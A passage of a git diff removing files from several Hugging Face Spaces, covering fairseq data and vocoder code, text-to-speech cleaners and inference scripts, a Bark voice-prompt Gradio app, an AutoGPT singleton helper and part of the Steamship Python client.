- parser.add_argument("split") - parser.add_argument("--max_chunk", type=int, default=1600000) - args = parser.parse_args() - logger.info(args) - - main(**vars(args)) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py deleted file mode 100644 index 40fa9aecdf9108e095feb3661236453c0f7ed7c4..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py +++ /dev/null @@ -1,124 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import os -import argparse -import pandas as pd -import sys - - -WORKDIR_ROOT = os.environ.get('WORKDIR_ROOT', None) - -if WORKDIR_ROOT is None or not WORKDIR_ROOT.strip(): - print('please specify your working directory root in OS environment variable WORKDIR_ROOT. 
Exitting..."') - sys.exit(-1) - -def load_langs(path): - with open(path) as fr: - langs = [l.strip() for l in fr] - return langs - - - -def load_sentences(raw_data, split, direction): - src, tgt = direction.split('-') - src_path = f"{raw_data}/{split}.{direction}.{src}" - tgt_path = f"{raw_data}/{split}.{direction}.{tgt}" - if os.path.exists(src_path) and os.path.exists(tgt_path): - return [(src, open(src_path).read().splitlines()), (tgt, open(tgt_path).read().splitlines())] - else: - return [] - -def swap_direction(d): - src, tgt = d.split('-') - return f'{tgt}-{src}' - -def get_all_test_data(raw_data, directions, split='test'): - test_data = [ - x - for dd in directions - for d in [dd, swap_direction(dd)] - for x in load_sentences(raw_data, split, d) - ] - # all_test_data = {s for _, d in test_data for s in d} - all_test_data = {} - for lang, d in test_data: - for s in d: - s = s.strip() - lgs = all_test_data.get(s, set()) - lgs.add(lang) - all_test_data[s] = lgs - return all_test_data, test_data - - -def check_train_sentences(src_path, tgt_path, direction, all_test_data, mess_up_train={}): - # src, tgt = direction.split('-') - print(f'check training data for {direction} in {src_path} and {tgt_path}') - size = 0 - overlapped_size_counted_dup = 0 - if not os.path.exists(tgt_path) or not os.path.exists(src_path): - return mess_up_train, size, overlapped_size_counted_dup - - with open(src_path) as f, open(tgt_path) as g: - for src_line, tgt_line in zip(f, g): - s = src_line.strip() - t = tgt_line.strip() - size += 1 - if s in all_test_data: - langs = mess_up_train.get(s, set()) - langs.add(direction) - mess_up_train[s] = langs - overlapped_size_counted_dup += 1 - if t in all_test_data: - langs = mess_up_train.get(t, set()) - langs.add(direction) - mess_up_train[t] = langs - overlapped_size_counted_dup += 1 - print(f'{direction}: size={size}, overlapped={overlapped_size_counted_dup}') - return mess_up_train, size, overlapped_size_counted_dup - -def check_train_all(raw_data, directions, all_test_data): - mess_up_train = {} - data_sizes = {} - # raw_data = '~chau/data-bin/MineBART/multilingual_mined_100M/en_XX/et_EE-en_XX/all.{en_XX, et_EE}' - print(f'checking training data againsts # {len(all_test_data)} sentences') - print(f'example test data: ', [s for i, s in enumerate(all_test_data.keys()) if i < 10]) - for direction in directions: - src, tgt = direction.split('-') - path = f'{raw_data}/en_XX/{direction}/all' - src_path = f'{path}.{src}' - tgt_path = f'{path}.{tgt}' - print(f'checking {src_path} {tgt_path}') - _, size, overlapped_size_counted_dup = check_train_sentences(src_path, tgt_path, direction, all_test_data, mess_up_train) - data_sizes[direction] = (size, overlapped_size_counted_dup) - return mess_up_train, data_sizes - - - - -def main(): - parser = argparse.ArgumentParser() - parser.add_argument("--folder", type=str, required=True, - help="the data folder ") - parser.add_argument("--test-data", type=str, required=True, - help="the test data folder ") - parser.add_argument('--directions', type=str, default=None, required=False) - - args = parser.parse_args() - directions = args.directions.split(',') - directions = sorted(set(directions)) - - results = [] - # print(f'checking where {args.split} split data are in training') - # print(f'direction\tcommon_count\tsrc common\ttgt common\tfrom_size\tto_size') - raw_data = args.folder - all_test_data, test_data = get_all_test_data(args.test_data, directions, split='test') - mess_up_train, data_sizes = check_train_all(raw_data, directions, 
all_test_data) - print(data_sizes) - - -if __name__ == "__main__": - main() diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py deleted file mode 100644 index cc4729e63c8ef551b29617d1169a44c24f509ad0..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py +++ /dev/null @@ -1,100 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import torch - - -def calc_mean_invstddev(feature): - if len(feature.size()) != 2: - raise ValueError("We expect the input feature to be 2-D tensor") - mean = feature.mean(0) - var = feature.var(0) - # avoid division by ~zero - eps = 1e-8 - if (var < eps).any(): - return mean, 1.0 / (torch.sqrt(var) + eps) - return mean, 1.0 / torch.sqrt(var) - - -def apply_mv_norm(features): - # If there is less than 2 spectrograms, the variance cannot be computed (is NaN) - # and normalization is not possible, so return the item as it is - if features.size(0) < 2: - return features - mean, invstddev = calc_mean_invstddev(features) - res = (features - mean) * invstddev - return res - - -def lengths_to_encoder_padding_mask(lengths, batch_first=False): - """ - convert lengths (a 1-D Long/Int tensor) to 2-D binary tensor - - Args: - lengths: a (B, )-shaped tensor - - Return: - max_length: maximum length of B sequences - encoder_padding_mask: a (max_length, B) binary mask, where - [t, b] = 0 for t < lengths[b] and 1 otherwise - - TODO: - kernelize this function if benchmarking shows this function is slow - """ - max_lengths = torch.max(lengths).item() - bsz = lengths.size(0) - encoder_padding_mask = torch.arange( - max_lengths - ).to( # a (T, ) tensor with [0, ..., T-1] - lengths.device - ).view( # move to the right device - 1, max_lengths - ).expand( # reshape to (1, T)-shaped tensor - bsz, -1 - ) >= lengths.view( # expand to (B, T)-shaped tensor - bsz, 1 - ).expand( - -1, max_lengths - ) - if not batch_first: - return encoder_padding_mask.t(), max_lengths - else: - return encoder_padding_mask, max_lengths - - -def encoder_padding_mask_to_lengths( - encoder_padding_mask, max_lengths, batch_size, device -): - """ - convert encoder_padding_mask (2-D binary tensor) to a 1-D tensor - - Conventionally, encoder output contains a encoder_padding_mask, which is - a 2-D mask in a shape (T, B), whose (t, b) element indicate whether - encoder_out[t, b] is a valid output (=0) or not (=1). 
Occasionally, we - need to convert this mask tensor to a 1-D tensor in shape (B, ), where - [b] denotes the valid length of b-th sequence - - Args: - encoder_padding_mask: a (T, B)-shaped binary tensor or None; if None, - indicating all are valid - Return: - seq_lengths: a (B,)-shaped tensor, where its (b, )-th element is the - number of valid elements of b-th sequence - - max_lengths: maximum length of all sequence, if encoder_padding_mask is - not None, max_lengths must equal to encoder_padding_mask.size(0) - - batch_size: batch size; if encoder_padding_mask is - not None, max_lengths must equal to encoder_padding_mask.size(1) - - device: which device to put the result on - """ - if encoder_padding_mask is None: - return torch.Tensor([max_lengths] * batch_size).to(torch.int32).to(device) - - assert encoder_padding_mask.size(0) == max_lengths, "max_lengths does not match" - assert encoder_padding_mask.size(1) == batch_size, "batch_size does not match" - - return max_lengths - torch.sum(encoder_padding_mask, dim=0) diff --git a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py b/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py deleted file mode 100644 index 996d6299f6e520600671a08e5897117200bd17ca..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py +++ /dev/null @@ -1,99 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -""" -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -""" - -import re -from unidecode import unidecode -from .numbers import normalize_numbers - - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r"\s+") - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [ - (re.compile("\\b%s\\." 
% x[0], re.IGNORECASE), x[1]) - for x in [ - ("mrs", "misess"), - ("mr", "mister"), - ("dr", "doctor"), - ("st", "saint"), - ("co", "company"), - ("jr", "junior"), - ("maj", "major"), - ("gen", "general"), - ("drs", "doctors"), - ("rev", "reverend"), - ("lt", "lieutenant"), - ("hon", "honorable"), - ("sgt", "sergeant"), - ("capt", "captain"), - ("esq", "esquire"), - ("ltd", "limited"), - ("col", "colonel"), - ("ft", "fort"), - ] -] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def expand_numbers(text): - return normalize_numbers(text) - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, " ", text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def basic_cleaners(text): - """Basic pipeline that lowercases and collapses whitespace without transliteration.""" - text = lowercase(text) - text = collapse_whitespace(text) - return text - - -def transliteration_cleaners(text): - """Pipeline for non-English text that transliterates to ASCII.""" - text = convert_to_ascii(text) - text = lowercase(text) - text = collapse_whitespace(text) - return text - - -def english_cleaners(text): - """Pipeline for English text, including number and abbreviation expansion.""" - text = convert_to_ascii(text) - text = lowercase(text) - text = expand_numbers(text) - text = expand_abbreviations(text) - text = collapse_whitespace(text) - return text - - -def basic_indic_cleaners(text): - """Basic pipeline that collapses whitespace without transliteration.""" - text = collapse_whitespace(text) - return text diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py deleted file mode 100644 index b373de8d62ce4aeb6ba5db5a07e8b018c347217b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py +++ /dev/null @@ -1,158 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals -from typing import Tuple -import sys -from argparse import ArgumentParser - -import torch -import numpy as np -import os -import json -import torch - -sys.path.append(os.path.join(os.path.dirname(__file__), "../src/glow_tts")) - -from scipy.io.wavfile import write -from hifi.env import AttrDict -from hifi.models import Generator - - -from text import text_to_sequence -import commons -import models -import utils - - -def check_directory(dir): - if not os.path.exists(dir): - sys.exit("Error: {} directory does not exist".format(dir)) - - -class TextToMel: - def __init__(self, glow_model_dir, device="cuda"): - self.glow_model_dir = glow_model_dir - check_directory(self.glow_model_dir) - self.device = device - self.hps, self.glow_tts_model = self.load_glow_tts() - pass - - def load_glow_tts(self): - hps = utils.get_hparams_from_dir(self.glow_model_dir) - checkpoint_path = utils.latest_checkpoint_path(self.glow_model_dir) - symbols = list(hps.data.punc) + list(hps.data.chars) - glow_tts_model = models.FlowGenerator( - len(symbols) + getattr(hps.data, "add_blank", False), - out_channels=hps.data.n_mel_channels, - **hps.model - ) # .to(self.device) - - if self.device == "cuda": - glow_tts_model.to("cuda") - - utils.load_checkpoint(checkpoint_path, glow_tts_model) - glow_tts_model.decoder.store_inverse() - _ = glow_tts_model.eval() - - return hps, glow_tts_model - - def generate_mel(self, text, noise_scale=0.667, 
length_scale=1.0): - symbols = list(self.hps.data.punc) + list(self.hps.data.chars) - cleaner = self.hps.data.text_cleaners - if getattr(self.hps.data, "add_blank", False): - text_norm = text_to_sequence(text, symbols, cleaner) - text_norm = commons.intersperse(text_norm, len(symbols)) - else: # If not using "add_blank" option during training, adding spaces at the beginning and the end of utterance improves quality - text = " " + text.strip() + " " - text_norm = text_to_sequence(text, symbols, cleaner) - - sequence = np.array(text_norm)[None, :] - - del symbols - del cleaner - del text - del text_norm - - if self.device == "cuda": - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]).cuda() - else: - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]) - - with torch.no_grad(): - (y_gen_tst, *_), *_, (attn_gen, *_) = self.glow_tts_model( - x_tst, - x_tst_lengths, - gen=True, - noise_scale=noise_scale, - length_scale=length_scale, - ) - del x_tst - del x_tst_lengths - torch.cuda.empty_cache() - return y_gen_tst - #return y_gen_tst.cpu().detach().numpy() - - -class MelToWav: - def __init__(self, hifi_model_dir, device="cuda"): - self.hifi_model_dir = hifi_model_dir - check_directory(self.hifi_model_dir) - self.device = device - self.h, self.hifi_gan_generator = self.load_hifi_gan() - pass - - def load_hifi_gan(self): - checkpoint_path = utils.latest_checkpoint_path(self.hifi_model_dir, regex="g_*") - config_file = os.path.join(self.hifi_model_dir, "config.json") - data = open(config_file).read() - json_config = json.loads(data) - h = AttrDict(json_config) - torch.manual_seed(h.seed) - - generator = Generator(h).to(self.device) - - assert os.path.isfile(checkpoint_path) - print("Loading '{}'".format(checkpoint_path)) - state_dict_g = torch.load(checkpoint_path, map_location=self.device) - print("Complete.") - - generator.load_state_dict(state_dict_g["generator"]) - - generator.eval() - generator.remove_weight_norm() - - return h, generator - - def generate_wav(self, mel): - #mel = torch.FloatTensor(mel).to(self.device) - - y_g_hat = self.hifi_gan_generator(mel.to(self.device)) # passing through vocoder - audio = y_g_hat.squeeze() - audio = audio * 32768.0 - audio = audio.cpu().detach().numpy().astype("int16") - - del y_g_hat - del mel - torch.cuda.empty_cache() - return audio, self.h.sampling_rate - - -if __name__ == "__main__": - - parser = ArgumentParser() - parser.add_argument("-m", "--model", required=True, type=str) - parser.add_argument("-g", "--gan", required=True, type=str) - parser.add_argument("-d", "--device", type=str, default="cpu") - parser.add_argument("-t", "--text", type=str, required=True) - parser.add_argument("-w", "--wav", type=str, required=True) - args = parser.parse_args() - - text_to_mel = TextToMel(glow_model_dir=args.model, device=args.device) - mel_to_wav = MelToWav(hifi_model_dir=args.gan, device=args.device) - - mel = text_to_mel.generate_mel(args.text) - audio, sr = mel_to_wav.generate_wav(mel) - - write(filename=args.wav, rate=sr, data=audio) - - pass diff --git a/spaces/HenryJJ/llm_template/README.md b/spaces/HenryJJ/llm_template/README.md deleted file mode 100644 index 9aeab4e954ab57e7a93d1d86846f275230329c05..0000000000000000000000000000000000000000 --- a/spaces/HenryJJ/llm_template/README.md +++ /dev/null @@ -1,17 +0,0 @@ ---- -title: Llm Template -emoji: 🌖 -colorFrom: yellow -colorTo: indigo -sdk: gradio -sdk_version: 3.41.2 
-app_file: app.py -pinned: false -license: apache-2.0 ---- - -``` -export no_proxy="localhost, 127.0.0.1" -``` - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py b/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py deleted file mode 100644 index 767ab11aa71974844e5f6a317e11948c30a7c2bf..0000000000000000000000000000000000000000 --- a/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py +++ /dev/null @@ -1,49 +0,0 @@ - -import os -import torchaudio -import torch -import numpy as np -import gradio as gr - -from hubert.hubert_manager import HuBERTManager -from hubert.pre_kmeans_hubert import CustomHubert -from hubert.customtokenizer import CustomTokenizer -from encodec import EncodecModel -from encodec.utils import convert_audio - -hubert_model = CustomHubert(checkpoint_path='hubert.pt') -model = EncodecModel.encodec_model_24khz() -model.set_target_bandwidth(6.0) -tokenizer = CustomTokenizer.load_from_checkpoint('polish-HuBERT-quantizer_8_epoch.pth', map_location=torch.device('cpu')) - - -def process_audio(in_file): - input_filename = in_file.name - - wav, sr = torchaudio.load(input_filename) - if wav.shape[0] == 2: - wav = wav.mean(0, keepdim=True) - semantic_vectors = hubert_model.forward(wav, input_sample_hz=sr) - semantic_tokens = tokenizer.get_token(semantic_vectors) - wav = convert_audio(wav, sr, model.sample_rate, model.channels) - wav = wav.unsqueeze(0) - with torch.no_grad(): - encoded_frames = model.encode(wav) - codes = torch.cat([encoded[0] for encoded in encoded_frames], dim=-1).squeeze() - fine_prompt = codes - coarse_prompt = fine_prompt[:2, :] - - output_filename = os.path.splitext(input_filename)[0] + '.npz' - - np.savez(output_filename, semantic_prompt=semantic_tokens, fine_prompt=fine_prompt, coarse_prompt=coarse_prompt) - return output_filename - -iface = gr.Interface(fn=process_audio, inputs=gr.inputs.File(label="Input Audio"), outputs=gr.outputs.File(label="Output File")) -iface.launch() - - - - - - - diff --git a/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py b/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py deleted file mode 100644 index 65d9f9f06bfe7ffa3ed332bb41c4cdd65ac2b916..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py +++ /dev/null @@ -1,197 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import logging -import json -from typing import Dict - -import numpy as np -import torch -from torch import nn -import torch.nn.functional as F - -from fairseq.data.audio.audio_utils import ( - get_window, get_fourier_basis, get_mel_filters, TTSSpectrogram -) -from fairseq.data.audio.speech_to_text_dataset import S2TDataConfig -from fairseq.models.text_to_speech.hifigan import Generator as HiFiGANModel - -logger = logging.getLogger(__name__) - - -class PseudoInverseMelScale(torch.nn.Module): - def __init__(self, n_stft, n_mels, sample_rate, f_min, f_max) -> None: - super(PseudoInverseMelScale, self).__init__() - self.n_mels = n_mels - basis = get_mel_filters( - sample_rate, (n_stft - 1) * 2, n_mels, f_min, f_max - ) - basis = torch.pinverse(basis) # F x F_mel - self.register_buffer('basis', basis) - - def forward(self, melspec: torch.Tensor) -> torch.Tensor: - # pack batch - shape = melspec.shape # B_1 x ... x B_K x F_mel x T - n_mels, time = shape[-2], shape[-1] - melspec = melspec.view(-1, n_mels, time) - - freq, _ = self.basis.size() # F x F_mel - assert self.n_mels == n_mels, (self.n_mels, n_mels) - specgram = self.basis.matmul(melspec).clamp(min=0) - - # unpack batch - specgram = specgram.view(shape[:-2] + (freq, time)) - return specgram - - -class GriffinLim(torch.nn.Module): - def __init__( - self, n_fft: int, win_length: int, hop_length: int, n_iter: int, - window_fn=torch.hann_window - ): - super(GriffinLim, self).__init__() - self.transform = TTSSpectrogram( - n_fft, win_length, hop_length, return_phase=True - ) - - basis = get_fourier_basis(n_fft) - basis = torch.pinverse(n_fft / hop_length * basis).T[:, None, :] - basis *= get_window(window_fn, n_fft, win_length) - self.register_buffer('basis', basis) - - self.n_fft = n_fft - self.win_length = win_length - self.hop_length = hop_length - self.n_iter = n_iter - - self.tiny = 1.1754944e-38 - - @classmethod - def get_window_sum_square( - cls, n_frames, hop_length, win_length, n_fft, - window_fn=torch.hann_window - ) -> torch.Tensor: - w_sq = get_window(window_fn, n_fft, win_length) ** 2 - n = n_fft + hop_length * (n_frames - 1) - x = torch.zeros(n, dtype=torch.float32) - for i in range(n_frames): - ofst = i * hop_length - x[ofst: min(n, ofst + n_fft)] += w_sq[:max(0, min(n_fft, n - ofst))] - return x - - def inverse(self, magnitude: torch.Tensor, phase) -> torch.Tensor: - x = torch.cat( - [magnitude * torch.cos(phase), magnitude * torch.sin(phase)], - dim=1 - ) - x = F.conv_transpose1d(x, self.basis, stride=self.hop_length) - win_sum_sq = self.get_window_sum_square( - magnitude.shape[-1], hop_length=self.hop_length, - win_length=self.win_length, n_fft=self.n_fft - ).to(magnitude.device) - # remove modulation effects - approx_nonzero_indices = win_sum_sq > self.tiny - x[:, :, approx_nonzero_indices] /= win_sum_sq[approx_nonzero_indices] - x *= self.n_fft / self.hop_length - x = x[:, :, self.n_fft // 2:] - x = x[:, :, :-self.n_fft // 2:] - return x - - def forward(self, specgram: torch.Tensor) -> torch.Tensor: - angles = np.angle(np.exp(2j * np.pi * np.random.rand(*specgram.shape))) - angles = torch.from_numpy(angles).to(specgram) - _specgram = specgram.view(-1, specgram.shape[-2], specgram.shape[-1]) - waveform = self.inverse(_specgram, angles).squeeze(1) - for _ in range(self.n_iter): - _, angles = self.transform(waveform) - waveform = self.inverse(_specgram, angles).squeeze(1) - return waveform.squeeze(0) - - -class GriffinLimVocoder(nn.Module): - def __init__(self, sample_rate, win_size, hop_size, n_fft, - n_mels, f_min, 
f_max, window_fn, - spec_bwd_max_iter=32, - fp16=False): - super().__init__() - self.inv_mel_transform = PseudoInverseMelScale( - n_stft=n_fft // 2 + 1, n_mels=n_mels, sample_rate=sample_rate, - f_min=f_min, f_max=f_max - ) - self.gl_transform = GriffinLim( - n_fft=n_fft, win_length=win_size, hop_length=hop_size, - window_fn=window_fn, n_iter=spec_bwd_max_iter - ) - if fp16: - self.half() - self.inv_mel_transform.half() - self.gl_transform.half() - else: - self.float() - self.inv_mel_transform.float() - self.gl_transform.float() - - def forward(self, x): - # x: (B x) T x D -> (B x) 1 x T - # NOTE: batched forward produces noisier waveform. recommend running - # one utterance at a time - self.eval() - x = x.exp().transpose(-1, -2) - x = self.inv_mel_transform(x) - x = self.gl_transform(x) - return x - - @classmethod - def from_data_cfg(cls, args, data_cfg: S2TDataConfig): - feat_cfg = data_cfg.config["features"] - window_fn = getattr(torch, feat_cfg["window_fn"] + "_window") - return cls( - sample_rate=feat_cfg["sample_rate"], - win_size=int(feat_cfg["win_len_t"] * feat_cfg["sample_rate"]), - hop_size=int(feat_cfg["hop_len_t"] * feat_cfg["sample_rate"]), - n_fft=feat_cfg["n_fft"], n_mels=feat_cfg["n_mels"], - f_min=feat_cfg["f_min"], f_max=feat_cfg["f_max"], - window_fn=window_fn, spec_bwd_max_iter=args.spec_bwd_max_iter, - fp16=args.fp16 - ) - - -class HiFiGANVocoder(nn.Module): - def __init__( - self, checkpoint_path: str, model_cfg: Dict[str, str], - fp16: bool = False - ) -> None: - super().__init__() - self.model = HiFiGANModel(model_cfg) - state_dict = torch.load(checkpoint_path) - self.model.load_state_dict(state_dict["generator"]) - if fp16: - self.model.half() - logger.info(f"loaded HiFiGAN checkpoint from {checkpoint_path}") - - def forward(self, x: torch.Tensor) -> torch.Tensor: - # (B x) T x D -> (B x) 1 x T - model = self.model.eval() - if len(x.shape) == 2: - return model(x.unsqueeze(0).transpose(1, 2)).detach().squeeze(0) - else: - return model(x.transpose(-1, -2)).detach() - - @classmethod - def from_data_cfg(cls, args, data_cfg: S2TDataConfig): - vocoder_cfg = data_cfg.vocoder - assert vocoder_cfg.get("type", "griffin_lim") == "hifigan" - with open(vocoder_cfg["config"]) as f: - model_cfg = json.load(f) - return cls(vocoder_cfg["checkpoint"], model_cfg, fp16=args.fp16) - - -def get_vocoder(args, data_cfg: S2TDataConfig): - if args.vocoder == "griffin_lim": - return GriffinLimVocoder.from_data_cfg(args, data_cfg) - elif args.vocoder == "hifigan": - return HiFiGANVocoder.from_data_cfg(args, data_cfg) - else: - raise ValueError("Unknown vocoder") diff --git a/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py b/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py deleted file mode 100644 index 919c67429f059707b271b067f40783c04a42a5ac..0000000000000000000000000000000000000000 --- a/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# -*- coding: utf-8 -*- -# file: __init__.py -# time: 05/12/2022 -# author: yangheng -# github: https://github.com/yangheng95 -# huggingface: https://huggingface.co/yangheng -# google scholar: https://scholar.google.com/citations?user=NPq5a_0AAAAJ&hl=en -# Copyright (C) 2021. All Rights Reserved. 
-from .magnify import ImageMagnifier diff --git a/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py b/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py deleted file mode 100644 index 55b2aeea120bbe51ca837265fcb7fbff467e55f2..0000000000000000000000000000000000000000 --- a/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py +++ /dev/null @@ -1,24 +0,0 @@ -"""The singleton metaclass for ensuring only one instance of a class.""" -import abc - - -class Singleton(abc.ABCMeta, type): - """ - Singleton metaclass for ensuring only one instance of a class. - """ - - _instances = {} - - def __call__(cls, *args, **kwargs): - """Call method for the singleton metaclass.""" - if cls not in cls._instances: - cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) - return cls._instances[cls] - - -class AbstractSingleton(abc.ABC, metaclass=Singleton): - """ - Abstract singleton class for ensuring only one instance of a class. - """ - - pass diff --git a/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py b/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py deleted file mode 100644 index c15c918842eef56cf72793a7df7157cfb2d86d7d..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py +++ /dev/null @@ -1,327 +0,0 @@ -from __future__ import annotations - -import logging -import uuid -from contextlib import contextmanager -from typing import Any, Dict, Generator, List, Optional - -from pydantic import BaseModel - -from steamship.base.client import Client -from steamship.base.configuration import Configuration -from steamship.base.error import SteamshipError -from steamship.client.skill_to_provider import SKILL_TO_PROVIDER -from steamship.client.skills import Skill -from steamship.client.vendors import Vendor -from steamship.data.embeddings import EmbedAndSearchRequest, QueryResults -from steamship.data.package.package_instance import PackageInstance -from steamship.data.plugin.index_plugin_instance import EmbeddingIndexPluginInstance -from steamship.data.plugin.plugin_instance import PluginInstance -from steamship.data.plugin.prompt_generation_plugin_instance import PromptGenerationPluginInstance -from steamship.data.workspace import Workspace -from steamship.utils.metadata import hash_dict - -_logger = logging.getLogger(__name__) - - -class Steamship(Client): - """Steamship Python Client.""" - - # Some plugin instances use special subclasses which provide helper methods and/or more complex - # behavior than typical PluginInstance subclass permits. 
Examples are: - # - # - Embedding indices (which much coordinate both embedding taggers & vector indices) - # - Prompt generators (which benefit from supporting, prompt-specific, methods) - _PLUGIN_INSTANCE_SUBCLASS_OVERRIDES = { - "prompt-generation-default": PromptGenerationPluginInstance, - "prompt-generation-trainable-default": PromptGenerationPluginInstance, - "gpt3": PromptGenerationPluginInstance, - "gpt-3": PromptGenerationPluginInstance, - "cerebrium": PromptGenerationPluginInstance, - "embedding-index": EmbeddingIndexPluginInstance, - } - - def __init__( - self, - api_key: str = None, - api_base: str = None, - app_base: str = None, - web_base: str = None, - workspace: str = None, - fail_if_workspace_exists: bool = False, - profile: str = None, - config_file: str = None, - config: Configuration = None, - trust_workspace_config: bool = False, # For use by lambda_handler; don't fetch the workspace - **kwargs, - ): - super().__init__( - api_key=api_key, - api_base=api_base, - app_base=app_base, - web_base=web_base, - workspace=workspace, - fail_if_workspace_exists=fail_if_workspace_exists, - profile=profile, - config_file=config_file, - config=config, - trust_workspace_config=trust_workspace_config, - **kwargs, - ) - # We use object.__setattr__ here in order to bypass Pydantic's overloading of it (which would block this - # set unless we were to add this as a field) - object.__setattr__(self, "use", self._instance_use) - object.__setattr__(self, "use_plugin", self._instance_use_plugin) - - def __repr_args__(self: BaseModel) -> Any: - """Because of the trick we've done with `use` and `use_plugin`, we need to exclude these from __repr__ - otherwise we'll get an infinite recursion.""" - return [ - (key, value) - for key, value in self.__dict__.items() - if key != "use" and key != "use_plugin" - ] - - def embed_and_search( - self, - query: str, - docs: List[str], - plugin_instance: str, - k: int = 1, - ) -> QueryResults: - req = EmbedAndSearchRequest(query=query, docs=docs, plugin_instance=plugin_instance, k=k) - return self.post( - "plugin/instance/embeddingSearch", - req, - expect=QueryResults, - ) - - @staticmethod - @contextmanager - def temporary_workspace(**kwargs) -> Generator["Steamship", None, None]: - """Create a client rooted in a temporary workspace that will be deleted after use.""" - # Create a new client and switch to a temporary workspace - client = Steamship(**kwargs) - temporary_handle = "temp-" + str(uuid.uuid4()) - client.switch_workspace(temporary_handle) - - # Safety check that we are now working form the new workspace. - if client.config.workspace_handle != temporary_handle: - raise SteamshipError( - message=f"Attempted to switch to temporary workspace {temporary_handle} but the client claimed to be working from {client.config.workspace_handle}" - ) - - yield client - - # Safely delete the temporary workspace. Here we re-fetch the workspace using the temporary_handle - # in case the user switched workspaces yet again upon the client. 
- workspace = Workspace.get(client, handle=temporary_handle) - if workspace.handle != temporary_handle: - raise SteamshipError( - message=f"Was about to delete temporary workspace {temporary_handle} but its handle is different: {workspace.handle}" - ) - else: - workspace.delete() - - @staticmethod - def use( - package_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - workspace_handle: Optional[str] = None, - **kwargs, - ) -> PackageInstance: - """Creates/loads an instance of package `package_handle`. - - The instance is named `instance_handle` and located in the Workspace named `instance_handle`. If no - `instance_handle` is provided, the default is `package_handle`. - - For example, one may write the following to always get back the same package instance, no matter how many - times you run it, scoped into its own workspace: - - ```python - instance = Steamship.use('package-handle', 'instance-handle') - ``` - - One may also write: - - ```python - instance = Steamship.use('package-handle') # Instance will also be named `package-handle` - ``` - - If you wish to override the usage of a workspace named `instance_handle`, you can provide the `workspace_handle` - parameter. - """ - if instance_handle is None: - instance_handle = package_handle - kwargs["workspace"] = workspace_handle or instance_handle - client = Steamship(**kwargs) - return client._instance_use( - package_handle=package_handle, - instance_handle=instance_handle, - config=config, - version=version, - fetch_if_exists=fetch_if_exists, - ) - - def _instance_use( - self, - package_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - ) -> PackageInstance: - """Creates/loads an instance of package `package_handle`. - - The instance is named `instance_handle` and located in the workspace this client is anchored to. - If no `instance_handle` is provided, 